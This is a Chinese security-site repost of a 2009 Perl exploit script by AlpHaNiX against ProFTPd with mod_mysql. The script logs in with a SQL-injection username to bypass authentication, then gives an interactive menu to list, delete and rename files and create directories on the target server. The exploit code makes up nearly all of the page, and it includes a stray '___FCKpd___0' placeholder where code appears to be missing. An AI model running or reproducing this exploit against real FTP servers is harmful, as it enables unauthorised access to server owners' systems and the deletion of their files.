首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Remote exploit for the authentication bypass vulnerability in ProFTPd using mod_
来源:NullArea.Net 作者:AlpHaNiX 发布时间:2009-02-12   
# Credits Go For gat3way For Finding The Bug ! [AT] http://milw0rm.com/exploits/8037
# Exploited By AlpHaNiX 
# HomePage NullArea.Net
# Greetz For Zigma-Djekmani-r1z

use Net::FTP;

if (@ARGV < 1 ) { print"\n\n\n[+] Usage : ".
                                      "\n\n[+] ./exploit.pl ftp.target.net \n\n" ; exit();}
$host = $ARGV[0]; 
system("cls") ;
                  print "----------------------------------------------------------\n".
                        "[+] ProFTPd with mod_mysql Authentication Bypass Exploit \n".
                        "[+] Credits Go For gat3way For Finding The Bug !\n".
						"[+] Exploited By AlpHaNiX \n".
						"[+] NullArea.Net\n".
                        "----------------------------------------------------------\n"."\n[!] Attacking $host ..." ;
$user = "USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --";
$pass = '1';

$ftp = Net::FTP->new("$host", Debug => 0) or die "[!] Cannot connect to $host";
$ftp->login("$user","$pass") or die "\n\n[!] Couldn't ByPass The authentication ! ", $ftp->message;
print "\n[*] Connected To $host";

print "\n[!] Please Choose A Command To Execute On $host :\n" ;
print "\n\n\n[1] Show Files\n" ;
print "[2] Delete File\n";
print "[3] Rename File or Dir\n";
print "[4] Create A Directory\n";
print "[5] Exit\n";
print "Enter Number Of Command Here => " ;
my $command = <STDIN> ;
chomp $command ;

if ($command==1){&Show}
if ($command==2){&Delete}
if ($command==3){&rename}
if ($command==4){&create_dir}
if ($command==5){&EXIT}
if ($command =! 1||2||3||4||5) {print "\n[!] Not Valid Choise ! Closing..." ;exit()}

 sub Show
{
print "\n\n\n[!] Please Specify a directory\n";
my $dir = <STDIN> ;
chomp $dir ;
$ftp->cwd($dir) or $newerr=1; 
  push @ERRORS, "Can't cd  $!\n" if $newerr;
  myerr() if $newerr;
  $ftp->quit if $newerr;

  @files=$ftp->dir or $newerr=1;
  push @ERRORS, "Can't get file list $!\n" if $newerr;
  myerr() if $newerr;
print "Got  file list\n";   
foreach(@files) {
  print "
___FCKpd___0

\n";
 
  }
   exit();
}

 sub Delete
{
print "\n\n\n[!] Please Specify a File To Delete\n";
my $file = <STDIN> ;
chomp $file ;
$ftp->delete($file) or die "\n[!] Error while Deleting $file => " , $ftp->message ;
print "\n[!] $file Deleted !";
}

 sub rename
{
print "\n\n\n[!] Please Specify a File To Rename\n";
my $file = <STDIN> ;
chomp $file ;
print "\n[!] Please Specify a New Name For $file\n";
my $name = <STDIN> ;
chomp $name ;
$ftp->rename($file,$name) or die "\n[!] Error while Renaming $file => " , $ftp->message ;
print "\n[!] $file Renamed to $name !";
}


 sub create_dir
{
print "\n\n\n[!] Please Specify a Directory Name To create\n";
my $dir = <STDIN> ;
chomp $dir ;
$ftp->mkdir($dir) or die "\n[!] Error while creating $dir => " , $ftp->message ;
print "\n[!] $dir Created !";
}

 sub EXIT
{
system("cls");
$ftp->quit;
exit();
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Bloggeruniverse v2Beta (editco
·Remote exploit for InselPhoto
·Lanius CMS version 0.5.1 cross
·TYPO3 < 4.0.12/4.1.10/4.2.6 (j
·ProFTPd with mod_mysql Authent
·ProFTPd with mod_mysql Authent
·Fluorine CMS 0.1 rc 1 FD / SQL
·Nokia N95-8 browser (setAttrib
·q-news 2.0 Remote Command Exec
·ea-gBook 0.1 Remote Command Ex
·BlogWrite 0.91 Remote FD / SQL
·CmsFaethon 2.2.0 (info.php ite
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved